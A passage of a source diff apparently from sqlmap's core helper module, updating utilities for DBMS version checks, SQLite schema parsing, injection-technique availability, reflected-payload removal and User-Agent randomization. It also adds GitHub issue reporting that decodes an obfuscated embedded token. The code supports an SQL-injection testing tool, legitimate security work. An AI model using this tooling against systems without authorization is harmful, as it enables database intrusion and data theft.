filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') + retVal = values + + if isinstance(values, _collections.Iterable): + retVal = [_ for _ in values if _ or _ == 0] + + return retVal -def isDBMSVersionAtLeast(version): +def isDBMSVersionAtLeast(minimum): """ - Checks if the recognized DBMS version is at least the version - specified + Checks if the recognized DBMS version is at least the version specified + + >>> pushValue(kb.dbmsVersion) + >>> kb.dbmsVersion = "2" + >>> isDBMSVersionAtLeast("1.3.4.1.4") + True + >>> isDBMSVersionAtLeast(2.1) + False + >>> isDBMSVersionAtLeast(">2") + False + >>> isDBMSVersionAtLeast(">=2.0") + True + >>> kb.dbmsVersion = "<2" + >>> isDBMSVersionAtLeast("2") + False + >>> isDBMSVersionAtLeast("1.5") + True + >>> kb.dbmsVersion = "MySQL 5.4.3-log4" + >>> isDBMSVersionAtLeast("5") + True + >>> kb.dbmsVersion = popValue() """ retVal = None - if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION: - value = Backend.getVersion().replace(" ", "").rstrip('.') + if not any(isNoneValue(_) for _ in (Backend.getVersion(), minimum)) and Backend.getVersion() != UNKNOWN_DBMS_VERSION: + version = Backend.getVersion().replace(" ", "").rstrip('.') - while True: - index = value.find('.', value.find('.') + 1) + correction = 0.0 + if ">=" in version: + pass + elif '>' in version: + correction = VERSION_COMPARISON_CORRECTION + elif '<' in version: + correction = -VERSION_COMPARISON_CORRECTION - if index > -1: - value = value[0:index] + value[index + 1:] - else: - break + version = extractRegexResult(r"(?P[0-9][0-9.]*)", version) + + if version: + if '.' in version: + parts = version.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + version = '.'.join(parts) - value = filterStringValue(value, '[0-9.><=]') + try: + version = float(filterStringValue(version, '[0-9.]')) + correction + except ValueError: + return None + + if isinstance(minimum, six.string_types): + if '.' 
in minimum: + parts = minimum.split('.', 1) + parts[1] = filterStringValue(parts[1], '[0-9]') + minimum = '.'.join(parts) + + correction = 0.0 + if minimum.startswith(">="): + pass + elif minimum.startswith(">"): + correction = VERSION_COMPARISON_CORRECTION - if isinstance(value, basestring): - if value.startswith(">="): - value = float(value.replace(">=", "")) - elif value.startswith(">"): - value = float(value.replace(">", "")) + 0.01 - elif value.startswith("<="): - value = float(value.replace("<=", "")) - elif value.startswith(">"): - value = float(value.replace("<", "")) - 0.01 + minimum = float(filterStringValue(minimum, '[0-9.]')) + correction - retVal = getUnicode(value) >= getUnicode(version) + retVal = version >= minimum return retVal def parseSqliteTableSchema(value): """ Parses table column names and types from specified SQLite table schema + + >>> kb.data.cachedColumns = {} + >>> parseSqliteTableSchema("CREATE TABLE users(\\n\\t\\tid INTEGER,\\n\\t\\tname TEXT\\n);") + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE dummy(`foo bar` BIGINT, \\"foo\\" VARCHAR, 'bar' TEXT)"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('foo bar', 'BIGINT'), ('foo', 'VARCHAR'), ('bar', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE suppliers(\\n\\tsupplier_id INTEGER PRIMARY KEY DESC,\\n\\tname TEXT NOT NULL\\n);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('supplier_id', 'INTEGER'), ('name', 'TEXT')) + True + >>> parseSqliteTableSchema("CREATE TABLE country_languages (\\n\\tcountry_id INTEGER NOT NULL,\\n\\tlanguage_id INTEGER NOT NULL,\\n\\tPRIMARY KEY (country_id, language_id),\\n\\tFOREIGN KEY (country_id) REFERENCES countries (country_id) ON DELETE CASCADE ON UPDATE NO ACTION,\\tFOREIGN KEY (language_id) REFERENCES languages (language_id) ON DELETE CASCADE ON UPDATE NO ACTION);"); + True + >>> tuple(kb.data.cachedColumns[conf.db][conf.tbl].items()) == (('country_id', 'INTEGER'), ('language_id', 'INTEGER')) + True """ + retVal = False + + value = extractRegexResult(r"(?s)\((?P.+)\)", value) + if value: table = {} - columns = {} + columns = OrderedDict() + + value = re.sub(r"\(.+?\)", "", value).strip() - for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)", value): - columns[match.group(1)] = match.group(2) + for match in re.finditer(r"(?:\A|,)\s*(([\"'`]).+?\2|\w+)(?:\s+(INT|INTEGER|TINYINT|SMALLINT|MEDIUMINT|BIGINT|UNSIGNED BIG INT|INT2|INT8|INTEGER|CHARACTER|VARCHAR|VARYING CHARACTER|NCHAR|NATIVE CHARACTER|NVARCHAR|TEXT|CLOB|LONGTEXT|BLOB|NONE|REAL|DOUBLE|DOUBLE PRECISION|FLOAT|REAL|NUMERIC|DECIMAL|BOOLEAN|DATE|DATETIME|NUMERIC)\b)?", decodeStringEscape(value), re.I): + column = match.group(1).strip(match.group(2) or "") + if re.search(r"(?i)\A(CONSTRAINT|PRIMARY|UNIQUE|CHECK|FOREIGN)\b", column.strip()): + continue + retVal = True + + columns[column] = match.group(3) or "TEXT" + + table[safeSQLIdentificatorNaming(conf.tbl, True)] = columns + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[conf.db].update(table) + else: + kb.data.cachedColumns[conf.db] = table - table[conf.tbl] = columns - kb.data.cachedColumns[conf.db] = table + return retVal def getTechniqueData(technique=None): """ Returns injection data for technique specified """ - return kb.injection.data.get(technique) + return kb.injection.data.get(technique if technique is not None else getTechnique()) def 
isTechniqueAvailable(technique): """ - Returns True if there is injection data which sqlmap could use for - technique specified + Returns True if there is injection data which sqlmap could use for technique specified + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.ERROR] = [test for test in getSortedInjectionTests() if "error" in test["title"].lower()][0] + >>> isTechniqueAvailable(PAYLOAD.TECHNIQUE.ERROR) + True + >>> kb.injection.data = popValue() """ - if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech: + if conf.technique and isinstance(conf.technique, list) and technique not in conf.technique: return False else: return getTechniqueData(technique) is not None +def isHeavyQueryBased(technique=None): + """ + Returns True whether current (kb.)technique is heavy-query based + + >>> pushValue(kb.injection.data) + >>> setTechnique(PAYLOAD.TECHNIQUE.STACKED) + >>> kb.injection.data[getTechnique()] = [test for test in getSortedInjectionTests() if "heavy" in test["title"].lower()][0] + >>> isHeavyQueryBased() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + technique = technique or getTechnique() + + if isTechniqueAvailable(technique): + data = getTechniqueData(technique) + if data and "heavy query" in data["title"].lower(): + retVal = True + + return retVal + +def isStackingAvailable(): + """ + Returns True whether techniques using stacking are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.STACKED] = [test for test in getSortedInjectionTests() if "stacked" in test["title"].lower()][0] + >>> isStackingAvailable() + True + >>> kb.injection.data = popValue() + """ + + retVal = False + + if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data: + retVal = True + else: + for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True): + data = getTechniqueData(technique) + if data and "stacked" in data["title"].lower(): + retVal = True + break + + return retVal + def isInferenceAvailable(): """ Returns True whether techniques using inference technique are available + + >>> pushValue(kb.injection.data) + >>> kb.injection.data[PAYLOAD.TECHNIQUE.BOOLEAN] = getSortedInjectionTests()[0] + >>> isInferenceAvailable() + True + >>> kb.injection.data = popValue() """ return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME)) @@ -2350,15 +3557,67 @@ def setOptimize(): Sets options turned on by switch '-o' """ - #conf.predictOutput = True + # conf.predictOutput = True conf.keepAlive = True - conf.threads = 3 if conf.threads < 3 else conf.threads - conf.nullConnection = not any([conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor]) + conf.threads = 3 if conf.threads < 3 and cmdLineOptions.threads is None else conf.threads + conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor)) if not conf.nullConnection: - debugMsg = "turning off --null-connection switch used indirectly by switch -o" + debugMsg = "turning off switch '--null-connection' used indirectly by switch '-o'" logger.debug(debugMsg) +def saveConfig(conf, filename): + """ + Saves conf to configuration filename + """ + + config = UnicodeRawConfigParser() + userOpts = {} + + for family in optDict: + userOpts[family] = [] + + for option, value in conf.items(): + for family, optionData in optDict.items(): + if option in optionData: + userOpts[family].append((option, value, 
optionData[option])) + + for family, optionData in userOpts.items(): + config.add_section(family) + + optionData.sort() + + for option, value, datatype in optionData: + if datatype and isListLike(datatype): + datatype = datatype[0] + + if option in IGNORE_SAVE_OPTIONS: + continue + + if value is None: + if datatype == OPTION_TYPE.BOOLEAN: + value = "False" + elif datatype in (OPTION_TYPE.INTEGER, OPTION_TYPE.FLOAT): + if option in defaults: + value = str(defaults[option]) + else: + value = '0' + elif datatype == OPTION_TYPE.STRING: + value = "" + + if isinstance(value, six.string_types): + value = value.replace("\n", "\n ") + + config.set(family, option, value) + + with openFile(filename, 'w') as f: + try: + config.write(f) + except IOError as ex: + errMsg = "something went wrong while trying " + errMsg += "to write to the configuration file '%s' ('%s')" % (filename, getSafeExString(ex)) + raise SqlmapSystemException(errMsg) + def initTechnique(technique=None): """ Prepares data for technique specified @@ -2377,7 +3636,7 @@ def initTechnique(technique=None): for key, value in kb.injection.conf.items(): if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))): setattr(conf, key, value) - debugMsg = "resuming configuration option '%s' (%s)" % (key, value) + debugMsg = "resuming configuration option '%s' (%s)" % (key, ("'%s'" % value) if isinstance(value, six.string_types) else value) logger.debug(debugMsg) if value and key == "optimize": @@ -2385,7 +3644,7 @@ def initTechnique(technique=None): else: warnMsg = "there is no injection data available for technique " warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique) - logger.warn(warnMsg) + logger.warning(warnMsg) except SqlmapDataException: errMsg = "missing data in old session file(s). 
" @@ -2396,9 +3655,14 @@ def initTechnique(technique=None): def arrayizeValue(value): """ Makes a list out of value if it is not already a list or tuple itself + + >>> arrayizeValue('1') + ['1'] """ - if not isListLike(value): + if isinstance(value, _collections.KeysView): + value = [_ for _ in value] + elif not isListLike(value): value = [value] return value @@ -2406,16 +3670,38 @@ def arrayizeValue(value): def unArrayizeValue(value): """ Makes a value out of iterable if it is a list or tuple itself + + >>> unArrayizeValue(['1']) + '1' + >>> unArrayizeValue('1') + '1' + >>> unArrayizeValue(['1', '2']) + '1' + >>> unArrayizeValue([['a', 'b'], 'c']) + 'a' + >>> unArrayizeValue(_ for _ in xrange(10)) + 0 """ if isListLike(value): - value = value[0] if len(value) > 0 else None + if not value: + value = None + elif len(value) == 1 and not isListLike(value[0]): + value = value[0] + else: + value = [_ for _ in flattenValue(value) if _ is not None] + value = value[0] if len(value) > 0 else None + elif inspect.isgenerator(value): + value = unArrayizeValue([_ for _ in value]) return value def flattenValue(value): """ Returns an iterator representing flat representation of a given value + + >>> [_ for _ in flattenValue([['1'], [['2'], '3']])] + ['1', '2', '3'] """ for i in iter(value): @@ -2425,17 +3711,46 @@ def flattenValue(value): else: yield i +def joinValue(value, delimiter=','): + """ + Returns a value consisting of joined parts of a given value + + >>> joinValue(['1', '2']) + '1,2' + >>> joinValue('1') + '1' + >>> joinValue(['1', None]) + '1,None' + """ + + if isListLike(value): + retVal = delimiter.join(getText(_ if _ is not None else "None") for _ in value) + else: + retVal = value + + return retVal + def isListLike(value): """ Returns True if the given value is a list-like instance + + >>> isListLike([1, 2, 3]) + True + >>> isListLike('2') + False """ - return isinstance(value, (list, tuple, set, BigArray)) + return isinstance(value, (list, tuple, set, OrderedSet, BigArray)) def getSortedInjectionTests(): """ - Returns prioritized test list by eventually detected DBMS from error - messages + Returns prioritized test list by eventually detected DBMS from error messages + + >>> pushValue(kb.forcedDbms) + >>> kb.forcedDbms = DBMS.SQLITE + >>> [test for test in getSortedInjectionTests() if hasattr(test, "details") and hasattr(test.details, "dbms")][0].details.dbms == kb.forcedDbms + True + >>> kb.forcedDbms = popValue() """ retVal = copy.deepcopy(conf.tests) @@ -2446,27 +3761,29 @@ def priorityFunction(test): if test.stype == PAYLOAD.TECHNIQUE.UNION: retVal = SORT_ORDER.LAST - elif 'details' in test and 'dbms' in test.details: - if test.details.dbms in Backend.getErrorParsedDBMSes(): + elif "details" in test and "dbms" in (test.details or {}): + if intersect(test.details.dbms, Backend.getIdentifiedDbms()): retVal = SORT_ORDER.SECOND else: retVal = SORT_ORDER.THIRD return retVal - if Backend.getErrorParsedDBMSes(): + if Backend.getIdentifiedDbms(): retVal = sorted(retVal, key=priorityFunction) return retVal def filterListValue(value, regex): """ - Returns list with items that have parts satisfying given regular - expression + Returns list with items that have parts satisfying given regular expression + + >>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)') + ['users', 'admins'] """ if isinstance(value, list) and regex: - retVal = filter(lambda _: re.search(regex, _, re.I), value) + retVal = [_ for _ in value if re.search(regex, _, re.I)] else: retVal = value @@ -2479,79 +3796,278 
@@ def showHttpErrorCodes(): if kb.httpErrorCodes: warnMsg = "HTTP error codes detected during run:\n" - warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \ - if code in httplib.responses else '?', count) \ - for code, count in kb.httpErrorCodes.items()) - logger.warn(warnMsg) + warnMsg += ", ".join("%d (%s) - %d times" % (code, _http_client.responses[code] if code in _http_client.responses else '?', count) for code, count in kb.httpErrorCodes.items()) + logger.warning(warnMsg) + if any((str(_).startswith('4') or str(_).startswith('5')) and _ != _http_client.INTERNAL_SERVER_ERROR and _ != kb.originalCode for _ in kb.httpErrorCodes): + msg = "too many 4xx and/or 5xx HTTP error codes " + msg += "could mean that some kind of protection is involved (e.g. WAF)" + logger.debug(msg) -def openFile(filename, mode='r'): +def openFile(filename, mode='r', encoding=UNICODE_ENCODING, errors="reversible", buffering=1): # "buffering=1" means line buffered (Reference: http://stackoverflow.com/a/3168436) """ Returns file handle of a given filename + + >>> "openFile" in openFile(__file__).read() + True + >>> b"openFile" in openFile(__file__, "rb", None).read() + True """ - try: - return codecs.open(filename, mode, UNICODE_ENCODING, "replace") - except IOError: - errMsg = "there has been a file opening error for filename '%s'. " % filename - errMsg += "Please check %s permissions on a file " % ("write" if \ - mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") - errMsg += "and that it's not locked by another process." - raise SqlmapFilePathException(errMsg) + # Reference: https://stackoverflow.com/a/37462452 + if 'b' in mode: + buffering = 0 + encoding = None + + if filename == STDIN_PIPE_DASH: + if filename not in kb.cache.content: + kb.cache.content[filename] = sys.stdin.read() + + return contextlib.closing(io.StringIO(readCachedFileContent(filename))) + else: + try: + return codecs_open(filename, mode, encoding, errors, buffering) + except IOError: + errMsg = "there has been a file opening error for filename '%s'. " % filename + errMsg += "Please check %s permissions on a file " % ("write" if mode and ('w' in mode or 'a' in mode or '+' in mode) else "read") + errMsg += "and that it's not locked by another process" + raise SqlmapSystemException(errMsg) def decodeIntToUnicode(value): """ Decodes inferenced integer value to an unicode character + + >>> decodeIntToUnicode(35) == '#' + True + >>> decodeIntToUnicode(64) == '@' + True """ retVal = value if isinstance(value, int): try: - # http://dev.mysql.com/doc/refman/5.0/en/string-functions.html#function_ord - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): - retVal = getUnicode(hexdecode(hex(value))) - elif value > 255: - retVal = unichr(value) + if value > 255: + _ = "%x" % value + + if len(_) % 2 == 1: + _ = "0%s" % _ + + raw = decodeHex(_) + + if Backend.isDbms(DBMS.MYSQL): + # Reference: https://dev.mysql.com/doc/refman/8.0/en/string-functions.html#function_ord + # Note: https://github.com/sqlmapproject/sqlmap/issues/1531 + retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING) + elif Backend.isDbms(DBMS.MSSQL): + # Reference: https://docs.microsoft.com/en-us/sql/relational-databases/collations/collation-and-unicode-support?view=sql-server-2017 and https://stackoverflow.com/a/14488478 + retVal = getUnicode(raw, "UTF-16-BE") + elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE): # Note: cases with Unicode code points (e.g. 
http://www.postgresqltutorial.com/postgresql-ascii/) + retVal = _unichr(value) + else: + retVal = getUnicode(raw, conf.encoding) else: - retVal = getUnicode(chr(value)) + retVal = _unichr(value) except: retVal = INFERENCE_UNKNOWN_CHAR return retVal +def getDaysFromLastUpdate(): + """ + Get total number of days from last update + + >>> getDaysFromLastUpdate() >= 0 + True + """ + + if not paths: + return + + return int(time.time() - os.path.getmtime(paths.SQLMAP_SETTINGS_PATH)) // (3600 * 24) + def unhandledExceptionMessage(): """ - Returns detailed message about occured unhandled exception + Returns detailed message about occurred unhandled exception + + >>> all(_ in unhandledExceptionMessage() for _ in ("unhandled exception occurred", "Operating system", "Command line")) + True """ - errMsg = "unhandled exception in %s, retry your " % VERSION_STRING - errMsg += "run with the latest development version from the GitHub " - errMsg += "repository. If the exception persists, please send by e-mail " - errMsg += "to '%s' or open a new issue at '%s' with the following text " % (ML, ISSUES_PAGE) - errMsg += "and any information required to reproduce the bug. The " - errMsg += "developers will try to reproduce the bug, fix it accordingly " - errMsg += "and get back to you.\n" - errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "") + errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING + errMsg += "run with the latest development version from official GitHub " + errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE + errMsg += "at '%s' " % ISSUES_PAGE + errMsg += "with the following text and any other information required to " + errMsg += "reproduce the bug. 
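# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The
# decodeIntToUnicode() hunk above turns an ORD()-style integer into a
# character, interpreting values above 255 in a DBMS-dependent way
# (UTF-16-BE for MSSQL, the connection charset for MySQL, a plain Unicode
# code point for PostgreSQL/Oracle/SQLite). A minimal standalone
# approximation of that branching (function and parameter names are the
# editor's, not sqlmap's API):

import binascii

def decode_ord_result(value, dbms="MYSQL", encoding="utf8"):
    if value <= 255:
        return chr(value)
    hexval = "%x" % value
    if len(hexval) % 2:                   # pad to an even number of nibbles
        hexval = "0" + hexval
    raw = binascii.unhexlify(hexval)
    if dbms == "MSSQL":
        return raw.decode("utf-16-be")    # NCHAR()-style 16-bit values
    if dbms in ("PGSQL", "ORACLE", "SQLITE"):
        return chr(value)                 # value already is a code point
    return raw.decode(encoding)           # e.g. MySQL ORD() over raw bytes

assert decode_ord_result(35) == "#"
assert decode_ord_result(0x441, dbms="MSSQL") == u"\u0441"
# ---------------------------------------------------------------------------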
Developers will try to reproduce the bug, fix it accordingly " + errMsg += "and get back to you\n" + errMsg += "Running version: %s\n" % VERSION_STRING[VERSION_STRING.find('/') + 1:] errMsg += "Python version: %s\n" % PYVERSION - errMsg += "Operating system: %s\n" % PLATFORM - errMsg += "Command line: %s\n" % " ".join(sys.argv) - errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else None) - errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms()) + errMsg += "Operating system: %s\n" % platform.platform() + errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap\.py\b", "sqlmap.py", getUnicode(" ".join(sys.argv), encoding=getattr(sys.stdin, "encoding", None))) + errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, getTechnique()) if getTechnique() is not None else ("DIRECT" if conf.get("direct") else None)) + errMsg += "Back-end DBMS:" + + if Backend.getDbms() is not None: + errMsg += " %s (fingerprinted)" % Backend.getDbms() + + if Backend.getIdentifiedDbms() is not None and (Backend.getDbms() is None or Backend.getIdentifiedDbms() != Backend.getDbms()): + errMsg += " %s (identified)" % Backend.getIdentifiedDbms() + + if not errMsg.endswith(')'): + errMsg += " None" + + return errMsg + +def getLatestRevision(): + """ + Retrieves latest revision from the offical repository + """ + + retVal = None + req = _urllib.request.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py", headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getUnicode(_urllib.request.urlopen(req).read()) + retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P[\d.]+)", content) + except: + pass + + return retVal + +def fetchRandomAgent(): + """ + Returns random HTTP User-Agent header value + + >>> '(' in fetchRandomAgent() + True + """ + + if not kb.userAgents: + debugMsg = "loading random HTTP User-Agent header(s) from " + debugMsg += "file '%s'" % paths.USER_AGENTS + logger.debug(debugMsg) + + try: + kb.userAgents = getFileItems(paths.USER_AGENTS) + except IOError: + errMsg = "unable to read HTTP User-Agent header " + errMsg += "file '%s'" % paths.USER_AGENTS + raise SqlmapSystemException(errMsg) + + return random.sample(kb.userAgents, 1)[0] + +def createGithubIssue(errMsg, excMsg): + """ + Automatically create a Github issue with unhandled exception information + """ + + try: + issues = getFileItems(paths.GITHUB_HISTORY, unique=True) + except: + issues = [] + finally: + issues = set(issues) + + _ = re.sub(r"'[^']+'", "''", excMsg) + _ = re.sub(r"\s+line \d+", "", _) + _ = re.sub(r'File ".+?/(\w+\.py)', r"\g<1>", _) + _ = re.sub(r".+\Z", "", _) + _ = re.sub(r"(Unicode[^:]*Error:).+", r"\g<1>", _) + _ = re.sub(r"= _", "= ", _) + + key = hashlib.md5(getBytes(_)).hexdigest()[:8] + + if key in issues: + return + + msg = "\ndo you want to automatically create a new (anonymized) issue " + msg += "with the unhandled exception information at " + msg += "the official Github repository? 
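# ---------------------------------------------------------------------------
# Editor's note: illustrative sketch, not part of the patch. The new
# getLatestRevision() above downloads lib/core/settings.py from the master
# branch and pulls the VERSION assignment out of it with a regex. A
# self-contained version of just the extraction step, run against an offline
# sample string instead of a live HTTP request (the group name "ver" and the
# sample version value are the editor's choices):

import re

def extract_version(settings_source):
    match = re.search(r"VERSION\s*=\s*[\"'](?P<ver>[\d.]+)", settings_source)
    return match.group("ver") if match else None

sample = 'VERSION = "1.9.2.11"\nTYPE = "dev"\n'
assert extract_version(sample) == "1.9.2.11"
# ---------------------------------------------------------------------------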
[y/N] " + try: + choice = readInput(msg, default='N', checkBatch=False, boolean=True) + except: + choice = None + + if choice: + _excMsg = None + errMsg = errMsg[errMsg.find("\n"):] + + req = _urllib.request.Request(url="https://api.github.com/search/issues?q=%s" % _urllib.parse.quote("repo:sqlmapproject/sqlmap Unhandled exception (#%s)" % key), headers={HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = _urllib.request.urlopen(req).read() + _ = json.loads(content) + duplicate = _["total_count"] > 0 + closed = duplicate and _["items"][0]["state"] == "closed" + if duplicate: + warnMsg = "issue seems to be already reported" + if closed: + warnMsg += " and resolved. Please update to the latest " + warnMsg += "development version from official GitHub repository at '%s'" % GIT_PAGE + logger.warning(warnMsg) + return + except: + pass - return maskSensitiveData(errMsg) + data = {"title": "Unhandled exception (#%s)" % key, "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)} + token = getText(zlib.decompress(decodeBase64(GITHUB_REPORT_OAUTH_TOKEN[::-1], binary=True))[0::2][::-1]) + req = _urllib.request.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=getBytes(json.dumps(data)), headers={HTTP_HEADER.AUTHORIZATION: "token %s" % token, HTTP_HEADER.USER_AGENT: fetchRandomAgent()}) + + try: + content = getText(_urllib.request.urlopen(req).read()) + except Exception as ex: + content = None + _excMsg = getSafeExString(ex) + + issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "") + if issueUrl: + infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0) + logger.info(infoMsg) + + try: + with openFile(paths.GITHUB_HISTORY, "a+") as f: + f.write("%s\n" % key) + except: + pass + else: + warnMsg = "something went wrong while creating a Github issue" + if _excMsg: + warnMsg += " ('%s')" % _excMsg + if "Unauthorized" in warnMsg: + warnMsg += ". 
Please update to the latest revision" + logger.warning(warnMsg) def maskSensitiveData(msg): """ Masks sensitive data in the supplied message + + >>> maskSensitiveData('python sqlmap.py -u "http://www.test.com/vuln.php?id=1" --banner') == 'python sqlmap.py -u *********************************** --banner' + True + >>> maskSensitiveData('sqlmap.py -u test.com/index.go?id=index --auth-type=basic --auth-creds=foo:bar\\ndummy line') == 'sqlmap.py -u ************************** --auth-type=***** --auth-creds=*******\\ndummy line' + True """ - retVal = msg + retVal = getUnicode(msg) + + for item in filterNone(conf.get(_) for _ in SENSITIVE_OPTIONS): + if isListLike(item): + item = listToStrValue(item) - for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "aCred", "pCred", "tbl", "db", "col", "user", "cookie", "proxy"))): - regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", item) + regex = SENSITIVE_DATA_REGEX % re.sub(r"(\W)", r"\\\1", getUnicode(item)) while extractRegexResult(regex, retVal): value = extractRegexResult(regex, retVal) retVal = retVal.replace(value, '*' * len(value)) + # Just in case (for problematic parameters regarding user encoding) + for match in re.finditer(r"(?im)[ -]-(u|url|data|cookie|auth-\w+|proxy|host|referer|headers?|H)( |=)(.*?)(?= -?-[a-z]|$)", retVal): + retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + + # Fail-safe substitutions + retVal = re.sub(r"(?i)(Command line:.+)\b(https?://[^ ]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + retVal = re.sub(r"(?i)(\b\w:[\\/]+Users[\\/]+|[\\/]+home[\\/]+)([^\\/]+)", lambda match: "%s%s" % (match.group(1), '*' * len(match.group(2))), retVal) + + if getpass.getuser(): + retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) + return retVal def listToStrValue(value): @@ -2562,7 +4078,7 @@ def listToStrValue(value): '1, 2, 3' """ - if isinstance(value, (set, tuple)): + if isinstance(value, (set, tuple, types.GeneratorType)): value = list(value) if isinstance(value, list): @@ -2572,48 +4088,55 @@ def listToStrValue(value): return retVal -def getExceptionFrameLocals(): +def intersect(containerA, containerB, lowerCase=False): """ - Returns dictionary with local variable content from frame - where exception has been raised + Returns intersection of the container-ized values + + >>> intersect([1, 2, 3], set([1,3])) + [1, 3] """ - retVal = {} + retVal = [] + + if containerA and containerB: + containerA = arrayizeValue(containerA) + containerB = arrayizeValue(containerB) + + if lowerCase: + containerA = [val.lower() if hasattr(val, "lower") else val for val in containerA] + containerB = [val.lower() if hasattr(val, "lower") else val for val in containerB] - if sys.exc_info(): - trace = sys.exc_info()[2] - while trace.tb_next: - trace = trace.tb_next - retVal = trace.tb_frame.f_locals + retVal = [val for val in containerA if val in containerB] return retVal -def intersect(valueA, valueB, lowerCase=False): +def decodeStringEscape(value): """ - Returns intersection of the array-ized values + Decodes escaped string values (e.g. 
"\\t" -> "\t") """ - retVal = None - - if valueA and valueB: - valueA = arrayizeValue(valueA) - valueB = arrayizeValue(valueB) - - if lowerCase: - valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA] - valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB] + retVal = value - retVal = [val for val in valueA if val in valueB] + if value and '\\' in value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(repr(_).strip("'"), _) return retVal -def cpuThrottle(value): +def encodeStringEscape(value): """ - Does a CPU throttling for lesser CPU consumption + Encodes escaped string values (e.g. "\t" -> "\\t") """ - delay = 0.00001 * (value ** 2) - time.sleep(delay) + retVal = value + + if value: + charset = "\\%s" % string.whitespace.replace(" ", "") + for _ in charset: + retVal = retVal.replace(_, repr(_).strip("'")) + + return retVal def removeReflectiveValues(content, payload, suppressWarning=False): """ @@ -2623,126 +4146,224 @@ def removeReflectiveValues(content, payload, suppressWarning=False): retVal = content - if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism: - def _(value): - while 2 * REFLECTED_REPLACEMENT_REGEX in value: - value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) - return value - - payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) - - if regex != payload: - if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check - parts = regex.split(REFLECTED_REPLACEMENT_REGEX) - retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach + try: + if all((content, payload)) and isinstance(content, six.text_type) and kb.reflectiveMechanism and not kb.heuristicMode: + def _(value): + while 2 * REFLECTED_REPLACEMENT_REGEX in value: + value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX) + return value - if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs - regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:]))) + payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True)) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", encodeStringEscape(REFLECTED_REPLACEMENT_REGEX))) - parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX)) + # NOTE: special case when part of the result shares the same output as the payload (e.g. ?id=1... 
